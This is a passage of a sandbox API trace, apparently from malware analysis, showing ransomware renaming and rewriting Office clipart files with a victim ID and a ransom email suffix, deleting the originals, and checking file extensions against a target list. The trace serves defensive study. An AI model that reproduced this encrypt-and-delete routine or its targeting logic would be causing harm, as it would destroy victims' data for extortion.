dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.864] GetLastError () returned 0x0 [0066.865] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xe4e, lpOverlapped=0x0) returned 1 [0066.870] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe50, lpOverlapped=0x0) returned 1 [0066.871] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.871] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.871] SetEndOfFile (hFile=0x340) returned 1 [0066.871] CloseHandle (hObject=0x340) returned 1 [0066.871] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.871] SetEndOfFile (hFile=0x354) returned 1 [0066.872] CloseHandle (hObject=0x354) returned 1 [0066.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.872] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf")) returned 1 [0066.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.874] lstrlenW (lpString=".doc") returned 4 [0066.874] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.874] lstrlenW (lpString=".docx") returned 5 [0066.874] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.874] lstrlenW (lpString=".pdf") returned 4 [0066.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.874] lstrlenW (lpString=".xls") returned 4 [0066.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.874] lstrlenW (lpString=".xlsx") returned 5 [0066.874] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.874] lstrlenW (lpString=".ppt") returned 4 [0066.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.874] lstrlenW (lpString=".zip") returned 4 [0066.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.874] lstrlenW (lpString=".rar") returned 4 [0066.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.874] lstrlenW (lpString=".bz2") returned 4 [0066.874] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.874] lstrlenW (lpString=".7z") returned 3 [0066.875] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.875] lstrlenW (lpString=".dbf") returned 4 [0066.875] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.875] lstrlenW (lpString=".1cd") returned 4 [0066.875] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 68 [0066.875] lstrlenW (lpString=".jpg") returned 4 [0066.875] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.876] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.876] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0066.879] GetLastError () returned 0x0 [0066.879] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5f8, lpOverlapped=0x0) returned 1 [0066.920] WriteFile (in: hFile=0x2c8, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x600, lpOverlapped=0x0) returned 1 [0066.920] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.920] WriteFile (in: hFile=0x2c8, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.920] SetEndOfFile (hFile=0x2c8) returned 1 [0066.921] CloseHandle (hObject=0x2c8) returned 1 [0066.921] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.921] SetEndOfFile (hFile=0x340) returned 1 [0066.921] CloseHandle (hObject=0x340) returned 1 [0066.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.922] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf")) returned 1 [0066.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.932] lstrlenW (lpString=".doc") returned 4 [0066.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString=".docx") returned 5 [0066.933] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.933] lstrlenW (lpString=".pdf") returned 4 [0066.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString=".xls") returned 4 [0066.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.933] lstrlenW (lpString=".xlsx") returned 5 [0066.933] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.933] lstrlenW (lpString=".ppt") returned 4 [0066.933] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.933] lstrlenW (lpString=".zip") returned 4 [0066.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.933] lstrlenW (lpString=".rar") returned 4 [0066.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString=".bz2") returned 4 [0066.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString=".7z") returned 3 [0066.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.933] lstrlenW (lpString=".dbf") returned 4 [0066.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.933] lstrlenW (lpString=".1cd") returned 4 [0066.933] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 68 [0066.933] lstrlenW (lpString=".jpg") returned 4 [0066.933] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.934] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.934] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.061] GetLastError () returned 0x0 [0067.061] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x16a6, lpOverlapped=0x0) returned 1 [0067.072] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x16b0, lpOverlapped=0x0) returned 1 [0067.073] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.073] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.073] SetEndOfFile (hFile=0x354) returned 1 [0067.073] CloseHandle (hObject=0x354) returned 1 [0067.073] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.073] SetEndOfFile (hFile=0x2c8) returned 1 [0067.074] CloseHandle (hObject=0x2c8) returned 1 [0067.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf")) returned 1 [0067.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.074] lstrlenW (lpString=".doc") returned 4 [0067.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.074] lstrlenW (lpString=".docx") returned 5 [0067.074] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.074] lstrlenW (lpString=".pdf") returned 4 [0067.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.074] lstrlenW (lpString=".xls") returned 4 [0067.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.075] lstrlenW (lpString=".xlsx") returned 5 [0067.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.075] lstrlenW (lpString=".ppt") returned 4 [0067.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.075] lstrlenW (lpString=".zip") returned 4 [0067.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.075] lstrlenW (lpString=".rar") returned 4 [0067.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.075] lstrlenW (lpString=".bz2") returned 4 [0067.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.075] lstrlenW (lpString=".7z") returned 3 [0067.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.075] lstrlenW (lpString=".dbf") returned 4 [0067.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.075] lstrlenW (lpString=".1cd") returned 4 [0067.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 68 [0067.075] lstrlenW (lpString=".jpg") returned 4 [0067.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.075] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.075] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0067.076] GetLastError () returned 0x0 [0067.076] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5bc, lpOverlapped=0x0) returned 1 [0067.082] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5c0, lpOverlapped=0x0) returned 1 [0067.083] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.083] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.083] SetEndOfFile (hFile=0x354) returned 1 [0067.084] CloseHandle (hObject=0x354) returned 1 [0067.084] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.084] SetEndOfFile (hFile=0x2c8) returned 1 [0067.084] CloseHandle (hObject=0x2c8) returned 1 [0067.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf")) returned 1 [0067.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.085] lstrlenW (lpString=".doc") returned 4 [0067.085] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.085] lstrlenW (lpString=".docx") returned 5 [0067.085] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.085] lstrlenW (lpString=".pdf") returned 4 [0067.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.085] lstrlenW (lpString=".xls") returned 4 [0067.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.085] lstrlenW (lpString=".xlsx") returned 5 [0067.085] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.085] lstrlenW (lpString=".ppt") returned 4 [0067.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.085] lstrlenW (lpString=".zip") returned 4 [0067.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.085] lstrlenW (lpString=".rar") returned 4 [0067.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.085] lstrlenW (lpString=".bz2") returned 4 [0067.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.085] lstrlenW (lpString=".7z") returned 3 [0067.086] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.086] lstrlenW (lpString=".dbf") returned 4 [0067.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.086] lstrlenW (lpString=".1cd") returned 4 [0067.086] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 68 [0067.086] lstrlenW (lpString=".jpg") returned 4 [0067.086] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.091] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.091] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.092] GetLastError () returned 0x0 [0067.092] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3158, lpOverlapped=0x0) returned 1 [0067.094] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3160, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3160, lpOverlapped=0x0) returned 1 [0067.095] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.095] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.095] SetEndOfFile (hFile=0x2c0) returned 1 [0067.096] CloseHandle (hObject=0x2c0) returned 1 [0067.096] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.096] SetEndOfFile (hFile=0x340) returned 1 [0067.096] CloseHandle (hObject=0x340) returned 1 [0067.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf")) returned 1 [0067.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.097] lstrlenW (lpString=".doc") returned 4 [0067.097] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.097] lstrlenW (lpString=".docx") returned 5 [0067.097] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.097] lstrlenW (lpString=".pdf") returned 4 [0067.097] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.097] lstrlenW (lpString=".xls") returned 4 [0067.097] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.097] lstrlenW (lpString=".xlsx") returned 5 [0067.097] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.097] lstrlenW (lpString=".ppt") returned 4 [0067.097] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.097] lstrlenW (lpString=".zip") returned 4 [0067.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.098] lstrlenW (lpString=".rar") returned 4 [0067.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.098] lstrlenW (lpString=".bz2") returned 4 [0067.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.098] lstrlenW (lpString=".7z") returned 3 [0067.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.098] lstrlenW (lpString=".dbf") returned 4 [0067.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.098] lstrlenW (lpString=".1cd") returned 4 [0067.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 68 [0067.098] lstrlenW (lpString=".jpg") returned 4 [0067.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.098] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.098] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.099] GetLastError () returned 0x0 [0067.099] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x844, lpOverlapped=0x0) returned 1 [0067.105] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x850, lpOverlapped=0x0) returned 1 [0067.107] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.107] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.107] SetEndOfFile (hFile=0x2c0) returned 1 [0067.107] CloseHandle (hObject=0x2c0) returned 1 [0067.107] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.108] SetEndOfFile (hFile=0x340) returned 1 [0067.108] CloseHandle (hObject=0x340) returned 1 [0067.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.108] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 